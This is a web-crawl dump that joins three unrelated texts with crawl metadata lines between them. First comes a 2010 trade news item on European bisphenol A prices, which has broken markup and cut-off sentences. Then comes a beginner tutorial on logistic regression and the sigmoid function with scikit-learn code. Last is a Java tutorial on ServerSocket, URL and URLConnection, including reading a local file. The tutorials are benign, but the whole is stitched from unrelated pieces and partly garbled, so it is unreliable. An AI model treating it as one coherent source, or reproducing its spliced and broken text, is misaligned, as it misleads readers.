30 March 2010 16:38 [Source: ICIS news] SAN ANTONIO, Texas (ICIS news)--April contracts for European bisphenol A (BPA) are expected to move up significantly on the back of restricted availability, firming demand and higher feedstock costs, a trader said on Tuesday. Speaking from the sidelines of the International Petrochemical Conference (IPC), the trader said that strong demand for polycarbonate (PC) had seen many producers’ captive demand rise, leaving less BPA available in the European market. “Customers are desperately looking for additional volumes,” said the trader. “The price does not matter at this stage. We are seeing spot prices now at around €1,600/tonne ($2,162/tonne), but there is no cargo.” Delayed restarts and shutdowns in Asia have also limited imports into ?xml:namespace> “There is also pressure on BPA coming from higher benzene and phenol prices,” the trader added. “The tightness is being felt throughout the chain. BPA sellers are looking for phenol and they cannot get it. Acetone prices are also moving up like crazy.” The trader said that April contracts were now largely done, with €1,450/tonne as a minimum price. Many players were already looking to secure volumes for May, the trader added. March BPA prices were assessed at €1,270-1,350/tonne FD (free delivered) NWE (northwest “The current situation for BPA will last until June,” said the trader. “Hexion will be back up by then, and the market could smoothen. However, Hexion started its planned turnaround on Wednesday 24 March. A company source said that the 160,000 tonne/year plant would be down until early May. Hosted by the National Petrochemical & Refiners Association (NPRA), the IPC continues through Tuesday. (
http://www.icis.com/Articles/2010/03/30/9347151/npra-10-april-europe-bpa-to-firm-on-tight-supply-strong-demand.html
CC-MAIN-2015-22
refinedweb
281
64.1
Logistic Regression Sign up for FREE 1 month of Kindle and read all our books for free. Get FREE domain for 1st year and build your brand new site Reading time: 20 minutes | Coding time: 5 minutes Logistic Regression is an efficient regression algorithm that aims to predict categorical values, often binary. It is widely used in: - the medical field to classify sick and healthy individuals - areas that need to determine a client's risk, such as insurance and financial companies. In statistics, the logistic model is a widely used statistical model that, in its basic form, uses a logistic function to model a binary dependent variable We encounter a lot of problems in today's world, which involve categorical data. One such widely popular example is right in your inbox. Out of all the emails, a classification model can classify each email as either spam, or not spam. In such algorithms, there is a target variable, which is binary, for binary classification problems. This implies, that the target variable (Y), can be thought of as either 1 or 0. An email, is always going to be one of either spam (Y=1) or not spam (Y=0). Such problems are called binary classification problems. Classification algorithms can also be applied to Multi-Class Classification problems, where the target variable can have more than two different categories. Need for logistic regression Let's assume a simple problem, with our Input feature (X) on the X axis, and the Target variable (Y) on the Y axis. We need to train a model, with the dataset as given as: Now, this is a fairly simple regression problem, and can be easily fitted by a linear regression line as shown here: Now, let's take a different dataset, with the points distributed in such a way, that they seem to form two categories, Y=0 and Y=1. In such cases, it becomes difficult to fit a good regression model. This is because we need a model that can output values that lie between 0 and 1. A regression line will incorporate values even lesser than 0, and greater than 1. This does not logically make sense. Regression also changes drastically to accommodate outliers in our dataset. That change, due to one or two outliers, may affect the predictions on all the other points. Also, a regression line will have a high loss function, as it is not passing close to all the points, as clearly shown. Hence, we need such an algorithm, that is: 1. Non linear, so as to fit all the points in such a way that they seem to belong to the decision boundary. 2. Restricted between 0 and 1, as our output target variable lies only between 0 and 1. 3. Is robust to the presence of outliers Logistic Regression, is very useful here, as it used a sigmoid function in order to calculate the probabilities of each point lying in either of the 2 classes. Sigmoid function In the previous section, we talked about logistic regression solving a lot of issues by using a 'sigmoid' function. A sigmoid function is written as: Y = 1 / (1 + e^(-x)). We can immediately notice from the definition of the function, that no matter what the value of x, Y will be between 0 and 1. This is a very important property of the sigmoid function for logistic regression. The use of a sigmoid function helps in fitting a better model, also because it is non-linear, so it can have a gradual curve, thus fitting categorical data better as we saw in the above example. Logistic Regression equation We realized earlier, that logistic regression calculates the probabilities of a point lying in either class, and not the fixed result that it will lie in either one of the classes. Therefore, the output prediction (Y), will be expressed as probability P. This idea works well partly because of the fact that the sigmoid function used, outputs the value of Y to be strictly between 0 and 1, and the same restriction is applied on probability as well, that the probability of anything must lie between 0 and 1. Logistic Regression can be understood by the equation given below, where the LHS represents the 'logit' function. This equation is basically another representation of Y = sigmoid(theta), something we understand logistic regression as. It is important to note here, that the logit equation and the sigmoid form equation are equivalent, and derivable from each other. Here, Y = Target variable theta = Input features B0, B1 .. Bk are the parameters to be trained X1, X2 ... Xk are the input features of the model Input features are represented as: theta = B0 + B1X1 + B2X2 + ...... BkXk, Advantages - Easy to handle independent variables categorical; - Provide results in terms of probability; - Ease of classification of individuals in categories; - Requires small number of assumptions; - High degree of reliability. Code Applying logistic regression to a dataset in Python is made really simple by using the Logistic Regression class present in the scikit learn library. This, like most other Machine Learning algorithms, follows a 4-step approach to building the model. STEP 1: Import the model we need: from sklearn.linear_model import LogisticRegression STEP 2: Define the model: Create an instance of the class model = LogisticRegression() STEP 3: Train the model: Fit input features (X) and target variable (Y) model.fit(x_train, y_train) STEP 4: Make predictions based on the model: Use test input features to predict values y_test = model.predict(x_test)
https://iq.opengenus.org/logistic-regression/
CC-MAIN-2021-17
refinedweb
919
50.67
I need to add two procedures: (1) one called �terms� (called by the main program) whose job is to display up to the first 10 terms in a sequence that starts with the value that it is passed (in $a0) and (2) a function called �rev� that will be called by the procedure �terms� � this function will actually calculate and return (in $v0) the reverse of the current term that is passed to it (in $a0) Driver: main: la $a0, intro # print intro li $v0, 4 syscall loop: la $a0, req # request value of n li $v0, 4 syscall li $v0, 5 # read value of n syscall ble $v0, $zero, out # if n is not positive, exit move $a0, $v0 # set parameter for terms procedure jal terms # call terms procedure j loop # branch back for next value of n out: la $a0, adios # display closing li $v0, 4 syscall li $v0, 10 # exit from the program syscall .data intro: .asciiz "Welcome to the Square1 tester!" req: .asciiz "\nEnter an integer (zero or negative to exit): " adios: .asciiz "Come back soon!\n"
http://www.chegg.com/homework-help/questions-and-answers/need-add-two-procedures-1-one-called-terms-called-main-program-whose-job-display-first-10--q3692738
CC-MAIN-2015-35
refinedweb
181
51.18
URLConnection URL Summary: In this "URLConnection URL", you will know how to read a file with URLConnection class. Methods of classes URLConnection and URL are explained with example code, explanation and screenshots. Are You Busy – A program on ServerSocket The developer can easily know which port number on the server is busy so that he can connect to that port number which is not busy. We know earlier that the port numbers should be within 0 to 65,535 (both inclusive). ServerSocket sersock = new ServerSocket(i); The job of java.net.ServerSocket is to bind the connection on the specified port number passed as parameter. This parameter is passed by the client system while requesting the connection to the server. Binding means the port number given to the client will not be given to another client until the first client disconnects himself. In client-server communication, it is the job of the server to bind the connection. The server uses ServerSocket class for it. To bind the connection, the server uses bind() method of ServerSocket. In this program, it is not used as we are not actually binding the connection; simply, the program is meant to know the port is busy or not. In the later programs, we use bind() method also. sersock.close(); When the client disconnects, the server calls close() method. When the ServerSocket is closed, the port number on which the connection is bound earlier is released. Now, this port number can be given by the server to another client. Practicing the Methods of URL We know earlier, the system in the network requires an address. This unique address, in networking terms, is known as URI (Universal Resource Indicator). As the name indicates, it is an indicator or pointer to a system containing some resource of data. The resource (or system) can be in the same network or in a different network including WWW. The URI can be given in two ways – URL or URN. The URL stands for Uniform Resource Indicator comprising four digital number separated by three dots like 125.252.226.27. The URN stands for Uniform Resource Name which is just a name like rediff.com. You know earlier, if the name is given, it is exchanged with the numbered address and then connection is established. Names are given to remember the systems easily (it is difficult to remember 12 digit number). Following list gives a few examples of URNs The complete URL can be divided into 5 parts. For example, http:// can be divided as follows. If any part is omitted in the URL, the network assumes it due to standard conventions of networking. - http – it is the protocol used in the communication - – it is the name of the system to which the client is to be connected - 7001 – it is the port number on which the service (or process) is available on the server required by the client - examplesWebApp/roses – it is the fragment identifier and depends on the service configuration on the server - password=srinivas – it is part of the request and represents the data passed to the server by the client. Basing on this data only server honors the client request Parsing URLs The above five pieces of the URL, like protocol and port number etc. can be retrieved by using the methods of class java.net.URL. Following program illustrates. import java.net.*; The above package is imported for two classes – URL and MalformedURLException. The URL class comes with many methods of type getXXX() that return a lot of information of the URL address. The getRef() method returns the anchor part of the URL which is the actual part of the document home.jsp required by the client. Reading straight with URL We know an URL points to some resource of data on a system. Using openStream() method of URL class, we can read the data from the resource. In the following program, the file Morals.txt available in D:\jyothi is read and printed at DOS prompt. URL url = new URL(""); Here, the URL points to the resource, Morals.txt available on the local system. The URL takes a string as parameter (the resource) and throws an exception java.net.MalformedURLException and is handled in the first catch block. InputStream is = url.openStream(); is.read(); openStream() method of URL class returns an object of java.io.InputStream. This object is used to read the file Morals.txt. This method also throws MalformedURLException. The read() method of InputStream reads byte by byte from the resource file, Morals.txt. This method throws java.io.IOException. System.out.print((char) temp); The read() method returns an integer value and should be converted into a character. For more on reading of this type, refer I/O Streams topic. Reading with URLConnection URLConnection is an abstract class from java.net package. It operates on the link established by the client with the server. Programmer can use URLConnection to retrieve the data about the resource (say, documents) referred by the URL. An object of URLConnection can be used to read from or write data on the documents referred by URL. This class gives more flexibility of operation over the server resources to the programmer over URL. The following program uses different methods of URL and also reads from a file referred by URL. URL url = new URL(""); Now the URL object url refers the resource in the form of file Morals.txt. URLConnection con = url.openConnection( ); The openConnection() method of URL class returns an object of URLConnection, con. The con object points to the file, Morals.txt. With con object, we can read or write into the file Morals.txt and also know the particulars of the URL address. The methods of URLConnection class, like getURL(), getDate(), getContentType(), getExpiration() and getLastModified() return the complete address as referred by the URL object, sending date of the resource referred by URL, the type of the content existing in the file (like html, plain text or image etc.), the expiration date of the resource (if the resource is a software) and the date of creation of the file Morals.txt or the latest modification date respectively. InputStream istream = con.getInputStream(); The URLConnection class includes two methods getInputStream() and getOutputStream() that return an object of InputStream and OutputStream. These objects are useful to read from the resource or write to the resource.
https://way2java.com/networking/urlconnection-url/
CC-MAIN-2017-39
refinedweb
1,065
65.12